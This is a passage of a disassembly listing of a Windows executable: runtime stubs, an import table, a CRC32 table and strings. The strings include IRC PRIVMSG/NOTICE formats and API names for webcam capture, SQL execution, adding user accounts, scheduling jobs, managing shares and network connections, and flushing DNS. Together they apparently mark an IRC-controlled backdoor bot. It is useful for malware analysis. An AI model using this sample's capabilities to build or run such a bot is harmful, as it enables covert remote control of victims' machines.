mov large fs:0, ecx
leave
retn 4
sub_429823 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_429823
mov dword ptr [esi], offset off_43A4D4
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42987E proc near ; CODE XREF: std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Grow(uint,bool)+D�p
; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(std::basic_string<char,std::char_traits<char>,std::allocator<char>> const &,uint,uint)+32�p ...
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_28 = byte ptr -28h
var_4 = dword ptr -4
mov eax, offset loc_42A0BE
call __EH_prolog
sub esp, 44h
push offset aStringTooLong ; "string too long"
lea ecx, [ebp+var_28]
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(char const *)
and [ebp+var_4], 0
lea eax, [ebp+var_28]
push eax
lea ecx, [ebp+var_50]
call sub_429712
push offset dword_43A94C
lea eax, [ebp+var_50]
push eax
mov [ebp+var_50], offset off_43A4C8
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
push esi
push [esp+54h+var_4C]
mov esi, ecx
call sub_429823
mov dword ptr [esi], offset off_43A4C8
mov eax, esi
pop esi
retn 4
sub_42987E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4298D6 proc near ; CODE XREF: sub_40ECCD+5E�p
; sub_411B17+14D�p ...
jmp ds:dword_42B214
sub_4298D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4298DC proc near ; CODE XREF: unknown_libname_2+24�p
; __global_unwind2+13�p
jmp ds:dword_42B19C
sub_4298DC endp
; [00000088 BYTES: COLLAPSED FUNCTION __wcsicmp. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION __strdup. PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION type_info::~type_info(void). PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION type_info::`scalar deleting destructor'(uint). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4299C6 proc near ; CODE XREF: sub_429712+11�p
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax+8], 0
mov dword ptr [eax], offset off_43A510
retn
sub_4299C6 endp
; [0000004A BYTES: COLLAPSED FUNCTION exception::exception(exception const &). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_429A21 proc near ; CODE XREF: sub_42975C+18�j
; sub_429A44+3�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_43A510
jz short locret_429A36
push dword ptr [ecx+4] ; Memory
call _free
pop ecx
locret_429A36: ; CODE XREF: sub_429A21+A�j
retn
sub_429A21 endp
; [0000000D BYTES: COLLAPSED FUNCTION unknown_libname_9. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_429A44(void *Memory,char)
sub_429A44 proc near ; DATA XREF: .rdata:off_43A510�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_429A21
test [esp+4+arg_0], 1
jz short loc_429A5A
push esi ; Memory
call j__free
pop ecx
loc_429A5A: ; CODE XREF: sub_429A44+D�j
mov eax, esi
pop esi
retn 4
sub_429A44 endp
; [00000043 BYTES: COLLAPSED FUNCTION __stricmp. PRESS KEYPAD "+" TO EXPAND]
; [00000081 BYTES: COLLAPSED FUNCTION _towlower. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004E BYTES: COLLAPSED FUNCTION ___ascii_stricmp. PRESS KEYPAD "+" TO EXPAND]
; [00000259 BYTES: COLLAPSED FUNCTION ___crtLCMapStringW. PRESS KEYPAD "+" TO EXPAND]
; [0000005A BYTES: COLLAPSED FUNCTION _iswctype. PRESS KEYPAD "+" TO EXPAND]
; [00000225 BYTES: COLLAPSED FUNCTION ___crtGetStringTypeW. PRESS KEYPAD "+" TO EXPAND]
; [0000000A BYTES: COLLAPSED FUNCTION unknown_libname_10. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42A060 proc near ; DATA XREF: .rdata:stru_43A7CC�o
lea ecx, [ebp-38h]
jmp loc_40F01A
sub_42A060 endp
; ---------------------------------------------------------------------------
loc_42A068: ; DATA XREF: sub_40F47A�o
mov eax, offset stru_43A7D4
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_42A072 proc near ; DATA XREF: .rdata:stru_43A7F0�o
lea ecx, [ebp+14h]
jmp loc_40F01A
sub_42A072 endp
; =============== S U B R O U T I N E =======================================
sub_42A07A proc near ; DATA XREF: .rdata:stru_43A7F0�o
; FUNCTION CHUNK AT 0040F01A SIZE 0000000A BYTES
lea ecx, [ebp-28h]
jmp loc_40F01A
sub_42A07A endp
; =============== S U B R O U T I N E =======================================
sub_42A082 proc near ; DATA XREF: sub_40F5F6�o
mov eax, offset stru_43A800
jmp ___CxxFrameHandler
sub_42A082 endp
; =============== S U B R O U T I N E =======================================
sub_42A08C proc near ; DATA XREF: .rdata:stru_43A81C�o
mov eax, dword_4E1F08
and eax, 0FFFFFFFEh
mov dword_4E1F08, eax
retn
sub_42A08C endp
; ---------------------------------------------------------------------------
loc_42A09A: ; DATA XREF: sub_41B802�o
mov eax, offset stru_43A824
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_42A0A4 proc near ; DATA XREF: .rdata:stru_43A8FC�o
mov ecx, [ebp-10h]
jmp sub_429A21
sub_42A0A4 endp
; ---------------------------------------------------------------------------
loc_42A0AC: ; DATA XREF: sub_429712�o sub_429823�o
mov eax, offset stru_43A904
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_42A0B6 proc near ; DATA XREF: .rdata:stru_43A95C�o
lea ecx, [ebp-28h]
jmp loc_40F01A
sub_42A0B6 endp
; ---------------------------------------------------------------------------
loc_42A0BE: ; DATA XREF: sub_4297E3�o sub_42987E�o
mov eax, offset stru_43A964
jmp ___CxxFrameHandler
; =============== S U B R O U T I N E =======================================
sub_42A0C8 proc near ; DATA XREF: .data:0043C008�o
push 0FFFFh
push 539h
call sub_41B325
pop ecx
pop ecx
mov dword_4D1FE4, eax
retn
sub_42A0C8 endp
; =============== S U B R O U T I N E =======================================
sub_42A0DF proc near ; DATA XREF: .data:0043C00C�o
push 0FFFEh
push 400h
call sub_41B325
pop ecx
pop ecx
mov dword_4D525C, eax
retn
sub_42A0DF endp
_text ends
; Section 2. (virtual address 0002B000)
; Virtual size : 00010448 ( 66632.)
; Section size in file : 00010448 ( 66632.)
; Offset to raw data for section: 0002B000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 42B000h
dword_42B000 dd 77E75CB5h ; DATA XREF: sub_40110F+DF�r
; sub_40274D+2D16�r ...
dword_42B004 dd 77E77963h ; DATA XREF: sub_40110F+B8�r
; WinMain(x,x,x,x)+2C5�r ...
dword_42B008 dd 77E61BB8h ; DATA XREF: sub_40110F+A7�r
; sub_40274D+6651�r ...
dword_42B00C dd 77E7A099h ; DATA XREF: sub_40110F+83�r
; sub_40274D+1E67�r ...
dword_42B010 dd 77E704FCh ; DATA XREF: sub_40110F+74�r
; sub_40274D+1FAD�r ...
dword_42B014 dd 77E61BE6h ; DATA XREF: sub_40110F+29�r
; sub_40123B+93�r ...
dword_42B018 dd 77E805D8h ; DATA XREF: sub_4012D6+13A�r
; sub_4012D6:loc_4017E4�r ...
dword_42B01C dd 77F5157Dh ; DATA XREF: sub_4012D6:loc_4013F6�r
; sub_4012D6:loc_401520�r ...
dword_42B020 dd 77E7A5FDh ; DATA XREF: sub_4012D6+11�r
; sub_419FFD+5F�r ...
dword_42B024 dd 77E79F93h ; DATA XREF: sub_4012D6+2�r
; WinMain(x,x,x,x)+CF�r ...
dword_42B028 dd 77E75CEBh ; DATA XREF: sub_40274D+7721�r
; sub_40AF6E+27�r ...
dword_42B02C dd 77E73628h ; DATA XREF: sub_40274D+7493�r
; WinMain(x,x,x,x)+325�r ...
dword_42B030 dd 77E6AD34h ; DATA XREF: sub_40274D+6697�r
; sub_41AEDD+35�r
dword_42B034 dd 77E71AFEh ; DATA XREF: sub_40274D+6484�r
dword_42B038 dd 77E7751Ah ; DATA XREF: sub_40274D+236D�r
; sub_40274D+2F80�r ...
dword_42B03C dd 77E7AC37h ; DATA XREF: sub_40274D+705�r
; sub_40274D+93B�r ...
dword_42B040 dd 77E706B7h ; DATA XREF: WinMain(x,x,x,x)+25E�r
; sub_419B8C+15�r ...
dword_42B044 dd 77E80656h ; DATA XREF: WinMain(x,x,x,x)+251�r
; ___security_init_cookie+27�r
dword_42B048 dd 77E6BD13h ; DATA XREF: WinMain(x,x,x,x):loc_40A417�r
; sub_40FDC3+E1�r ...
dword_42B04C dd 77E70396h ; DATA XREF: WinMain(x,x,x,x)+1AE�r
; WinMain(x,x,x,x)+20B�r ...
dword_42B050 dd 77E74CABh ; DATA XREF: WinMain(x,x,x,x)+197�r
; sub_412B2A+10F�r ...
dword_42B054 dd 77E79D5Bh ; DATA XREF: WinMain(x,x,x,x)+6B�r
; WinMain(x,x,x,x)+2FB�r ...
dword_42B058 dd 77E7C2C4h ; DATA XREF: WinMain(x,x,x,x)+64�r
dword_42B05C dd 77E65F4Ch ; DATA XREF: .text:0040A93B�r
; sub_41BE8A+34�r
dword_42B060 dd 77E7513Ch ; DATA XREF: .text:0040A9A8�r
; ___ansicp+20�r
dword_42B064 dd 77E7C657h ; DATA XREF: .text:0040AA18�r
; sub_41B065+32�r ...
dword_42B068 dd 77E73C49h ; DATA XREF: sub_40B186+43�r
; sub_40BCF3+204�r ...
dword_42B06C dd 77F7E300h ; DATA XREF: sub_40BCF3+12C�r
dword_42B070 dd 77F7E21Fh ; DATA XREF: sub_40BCF3+C7�r
dword_42B074 dd 77E7C706h ; DATA XREF: sub_40BEFE+79�r
dword_42B078 dd 77F53275h ; DATA XREF: sub_40BEFE+6D�r
; sub_40BEFE+246�r
dword_42B07C dd 77E77CCEh ; DATA XREF: sub_40C89B+61�r
; sub_40C979+61�r ...
dword_42B080 dd 77E78B82h ; DATA XREF: .text:0040CD7C�r
; sub_41150A+25�r ...
dword_42B084 dd 77E79D8Ch ; DATA XREF: .text:0040CD47�r
; .text:0041063F�r ...
dword_42B088 dd 77E73EACh ; DATA XREF: .text:0040CD2D�r
; .text:00410623�r
dword_42B08C dd 77E7A837h ; DATA XREF: .text:0040CCAF�r
; .text:004105EB�r ...
dword_42B090 dd 77E79924h ; DATA XREF: sub_40F87A+A9�r
; sub_4100AE+110�r ...
dword_42B094 dd 77E616B4h ; DATA XREF: sub_411555+198�r
; sub_414056+119�r ...
dword_42B098 dd 77E79CE3h ; DATA XREF: sub_411555+111�r
; sub_413CD4+73�r ...
dword_42B09C dd 77E79C90h ; DATA XREF: sub_411555+FD�r
; sub_411555+10A�r ...
dword_42B0A0 dd 77E7727Ah ; DATA XREF: sub_411555+74�r
; sub_413F5A+48�r ...
dword_42B0A4 dd 77E78EAAh ; DATA XREF: sub_412135+5ED�r
; sub_419799+C0�r ...
dword_42B0A8 dd 77E79424h ; DATA XREF: sub_412135+27A�r
; sub_419B8C+12D�r
dword_42B0AC dd 77E794BFh ; DATA XREF: sub_412135+26C�r
; sub_419B8C+11B�r
dword_42B0B0 dd 77E75E67h ; DATA XREF: sub_412135+20C�r
; sub_412135+5DC�r ...
dword_42B0B4 dd 77E75D9Eh ; DATA XREF: sub_412135+1FB�r
; sub_419799+26�r
dword_42B0B8 dd 77E78C81h ; DATA XREF: sub_4127B6+6C�r
; sub_418956+255�r ...
dword_42B0BC dd 77E793EFh ; DATA XREF: sub_4127B6+38�r
; sub_412B2A+1ED�r ...
dword_42B0C0 dd 77E64106h ; DATA XREF: sub_4129C2+9B�r
; sub_41D779+185�r
dword_42B0C4 dd 77E64006h ; DATA XREF: sub_4129C2+87�r
; sub_41D779+16E�r
dword_42B0C8 dd 77E76968h ; DATA XREF: sub_413A51+61�r
dword_42B0CC dd 77EC7C51h ; DATA XREF: sub_413E45+4D�r
dword_42B0D0 dd 77E74C59h ; DATA XREF: sub_414056+CB�r
dword_42B0D4 dd 77E70F89h ; DATA XREF: sub_414B1C+E�r
; sub_417D70+D�r
dword_42B0D8 dd 77E802FCh ; DATA XREF: sub_415825+188�r
; sub_415825+1FA�r ...
dword_42B0DC dd 77E6D75Bh ; DATA XREF: sub_415825+17E�r
; sub_4164A9+FB�r
dword_42B0E0 dd 77F51597h ; DATA XREF: sub_419A03+41�r
; sub_419A03+F5�r ...
dword_42B0E4 dd 77F516F8h ; DATA XREF: sub_419A03+21�r
; sub_419B8C+4A�r ...
dword_42B0E8 dd 77E77CB7h ; DATA XREF: sub_419A03+10�r
; sub_419B8C+40�r ...
dword_42B0EC dd 77E7F01Ah ; DATA XREF: sub_419B8C+88�r
; sub_419D2A+53�r
dword_42B0F0 dd 77E61A54h ; DATA XREF: sub_419B8C+53�r
; sub_419D2A+8D�r
dword_42B0F4 dd 77E7C3A5h ; DATA XREF: sub_419B8C+34�r
; sub_419D2A+2C�r ...
dword_42B0F8 dd 77E80618h ; DATA XREF: sub_419FFD+16F�r
; sub_41B24B+B6�r
dword_42B0FC dd 77E78147h ; DATA XREF: sub_419FFD+BB�r
dword_42B100 dd 77E76A60h ; DATA XREF: sub_41ACD0+2D�r
dword_42B104 dd 77E71B14h ; DATA XREF: sub_41AD5A+26�r
dword_42B108 dd 77E7166Fh ; DATA XREF: sub_41AD5A+1D�r
dword_42B10C dd 77E75090h ; DATA XREF: sub_41AD95+69�r
dword_42B110 dd 77E74D76h ; DATA XREF: sub_41AD95+36�r
dword_42B114 dd 77E77797h ; DATA XREF: sub_41AD95+25�r
dword_42B118 dd 77E7011Ah ; DATA XREF: sub_41AE17+96�r
dword_42B11C dd 77E73CE2h ; DATA XREF: sub_41AE17+60�r
dword_42B120 dd 77E668D9h ; DATA XREF: sub_41AEDD+15D�r
dword_42B124 dd 77E76A2Eh ; DATA XREF: sub_41C444+D5�r
dword_42B128 dd 77E7FF65h ; DATA XREF: sub_41C87C+3B�r
dword_42B12C dd 77EB7624h ; DATA XREF: sub_41C87C+21�r
dword_42B130 dd 77E6C29Dh ; DATA XREF: sub_41CEAF+1EC�r
dword_42B134 dd 77E76C1Ah ; DATA XREF: sub_41D779+19E�r
dword_42B138 dd 77E775F1h ; DATA XREF: __ValidateEH3RN+131�r
; __ValidateEH3RN+196�r ...
dword_42B13C dd 77E7176Ch ; DATA XREF: _ValidateExecute(int (*)(void))+8�r
dword_42B140 dd 77E7339Ch ; DATA XREF: sub_4281D4+C�r
dword_42B144 dd 77F522F2h ; DATA XREF: __msize+30�r
dword_42B148 dd 77E77CC4h ; DATA XREF: ___security_init_cookie+2F�r
dword_42B14C dd 77E7C866h ; DATA XREF: ___crtGetStringTypeA+24�r
; ___crtGetStringTypeA+128�r ...
dword_42B150 dd 77E641EBh ; DATA XREF: ___crtGetStringTypeA+19C�r
; ___crtGetStringTypeW+1CD�r
dword_42B154 dd 77E73FF9h ; DATA XREF: unknown_libname_6+2C�r
dword_42B158 dd 77E7FF2Eh ; DATA XREF: __set_osfhnd:loc_4268CB�r
; __free_osfhnd:loc_426945�r
dword_42B15C dd 77E77EE1h ; DATA XREF: ___crtGetEnvironmentStringsA+B�r
dword_42B160 dd 77E7C9E1h ; DATA XREF: ___crtGetEnvironmentStringsA+C1�r
dword_42B164 dd 77E67702h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_426793�r
dword_42B168 dd 77E9C5B1h ; DATA XREF: ___crtGetEnvironmentStringsA+113�r
dword_42B16C dd 77EB9A84h ; DATA XREF: __XcptFilter+167�r
dword_42B170 dd 77E781F9h ; DATA XREF: ___crtLCMapStringA+27�r
; ___crtLCMapStringA+15B�r ...
dword_42B174 dd 77E77405h ; DATA XREF: ___crtLCMapStringA+2C3�r
; ___crtLCMapStringA+344�r ...
dword_42B178 dd 77E7F044h ; DATA XREF: __resetstkoflw+1A�r
; __resetstkoflw+71�r ...
dword_42B17C dd 77E6169Ah ; DATA XREF: __resetstkoflw+D5�r
dword_42B180 dd 77E7C9E7h ; DATA XREF: sub_4255AA+5�r
; sub_4255BD+6�r
dword_42B184 dd 77E78406h ; DATA XREF: __ioinit+FE�r
; __ioinit+165�r ...
dword_42B188 dd 77E79C3Dh ; DATA XREF: __ioinit+157�r
; __NMSG_WRITE+14E�r
dword_42B18C dd 77E7C931h ; DATA XREF: __ioinit+19C�r
dword_42B190 dd 77E7849Fh ; DATA XREF: _setSBUpLow+1C�r
; __setmbcp+93�r ...
dword_42B194 dd 77F5722Fh ; DATA XREF: _realloc+FD�r
; _realloc+13D�r ...
dword_42B198 dd 77E6167Bh ; DATA XREF: _time+9�r
; ___security_init_cookie+1B�r
dword_42B19C dd 77F6183Eh ; DATA XREF: sub_4298DC�r
dword_42B1A0 dd 77E6D706h ; DATA XREF: _CxxThrowException(x,x)+2E�r
; __raise_exc+1F5�r
dword_42B1A4 dd 77E6177Ah ; DATA XREF: start+160�r __ioinit+57�r
dword_42B1A8 dd 77E7C938h ; DATA XREF: start:loc_420E19�r
dword_42B1AC dd 77E76E0Bh ; DATA XREF: __heap_init+44�r
dword_42B1B0 dd 77E7C726h ; DATA XREF: __heap_init+11�r
dword_42B1B4 dd 77E79E34h ; DATA XREF: ___sbh_free_block+22F�r
dword_42B1B8 dd 77E7980Ah ; DATA XREF: ___sbh_alloc_new_region+7E�r
; ___sbh_alloc_new_group+52�r ...
dword_42B1BC dd 77E73196h ; DATA XREF: sub_4281F0+C�r
dword_42B1C0 dd 77E7A13Fh ; DATA XREF: __setmbcp+42�r
dword_42B1C4 dd 77E6C703h ; DATA XREF: __setmbcp+2B�r
dword_42B1C8 dd 77E70192h ; DATA XREF: __chsize+104�r
align 10h
dword_42B1D0 dd 71AB5A01h ; DATA XREF: sub_41776E+22�r
dword_42B1D4 dd 71AB4122h ; DATA XREF: sub_417688+CD�r
dword_42B1D8 dd 71AB1746h ; DATA XREF: sub_41549E+198�r
; sub_41549E+1A7�r
dword_42B1DC dd 71AB401Ch ; DATA XREF: sub_41549E+1D3�r
; sub_41549E+1FA�r
dword_42B1E0 dd 71AB3F8Dh ; DATA XREF: sub_411B17+5C�r
dword_42B1E4 dd 71AB155Ah ; DATA XREF: sub_411B17+8F�r
; sub_416311+6E�r ...
dword_42B1E8 dd 71AB3ECEh ; DATA XREF: sub_411B17+B9�r
dword_42B1EC dd 71AB5DE2h ; DATA XREF: sub_411B17+CA�r
dword_42B1F0 dd 71AB868Dh ; DATA XREF: sub_411B17+174�r
dword_42B1F4 dd 71AB3E5Dh ; DATA XREF: sub_411A00+57�r
; sub_416311+88�r ...
dword_42B1F8 dd 71AB1A6Dh ; DATA XREF: sub_411A00+68�r
; sub_411A7D+88�r ...
dword_42B1FC dd 71AB1836h ; DATA XREF: sub_411A00+6E�r
; sub_411A7D+8E�r
dword_42B200 dd 71AB1746h ; DATA XREF: sub_410BF8+4A�r
; sub_411A00+41�r ...
dword_42B204 dd 71AB41DAh ; DATA XREF: .text:004106DF�r
; sub_411A00+15�r ...
dword_42B208 dd 71AB5690h ; DATA XREF: .text:0040FC17�r
; sub_411B17+1D6�r
dword_42B20C dd 71AB3C22h ; DATA XREF: .text:0040F780�r
; sub_411A00+21�r ...
dword_42B210 dd 71AB1AF4h ; DATA XREF: sub_40EE6B+12�r
; sub_410BF8+15E�r ...
dword_42B214 dd 71AB1B7Bh ; DATA XREF: sub_4298D6�r
dword_42B218 dd 71AB12F8h ; DATA XREF: .text:0040D16B�r
; sub_411A00+35�r ...
dword_42B21C dd 71AB1890h ; DATA XREF: .text:0040D6E3�r
; sub_40ECCD+4C�r ...
dword_42B220 dd 71AB157Eh ; DATA XREF: sub_40274D+2D73�r
align 10h
dword_42B230 dd 0 ; DATA XREF: sub_401071+1F�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
; char aRb[]
aRb db 'rb',0 ; DATA XREF: sub_40109F+B�o
; sub_411A7D+24�o ...
; char byte_42B633
byte_42B633 db 0 ; DATA XREF: sub_40110F+62�o
; sub_40274D+1CFD�o ...
; char Format[]
Format db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40123B+58�o
; char aS[]
aS db '%s',0 ; DATA XREF: sub_40123B+35�o
; sub_40274D+659�o ...
align 4
; char aPrivmsg[]
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40123B+16�o
; sub_40274D+592�o
; char Str[]
Str db 'NOTICE',0 ; DATA XREF: sub_40123B+F�o
; sub_40274D+5A1�o
align 4
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_4012D6+C7F�o
align 10h
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_4012D6+C77�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_4012D6:loc_401F40�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_4012D6+C15�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_4012D6+C08�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_4012D6+BFB�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_4012D6+BEE�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_4012D6+BE1�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_4012D6+BD9�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_4012D6:loc_401EA2�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_4012D6+B97�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_4012D6+B8F�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_4012D6:loc_401E58�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_4012D6+B3D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_4012D6+B30�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_4012D6+B23�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_4012D6+B1B�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_4012D6:loc_401DE4�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_4012D6+AD9�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_4012D6+AD1�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_4012D6:loc_401D9A�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_4012D6+A8F�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_4012D6+A87�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_4012D6:loc_401D50�o
align 4
aNetwkstagetinf db 'NetWkstaGetInfo',0 ; DATA XREF: sub_4012D6+9F9�o
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_4012D6+9EC�o
; sub_41B24B+47�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_4012D6+9DF�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_4012D6+9D2�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_4012D6+9C5�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_4012D6+9B8�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_4012D6+9AB�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_4012D6+99E�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_4012D6+991�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_4012D6+984�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_4012D6+977�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_4012D6+96F�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_4012D6:loc_401C34�o
; sub_41B24B+3A�o
align 4
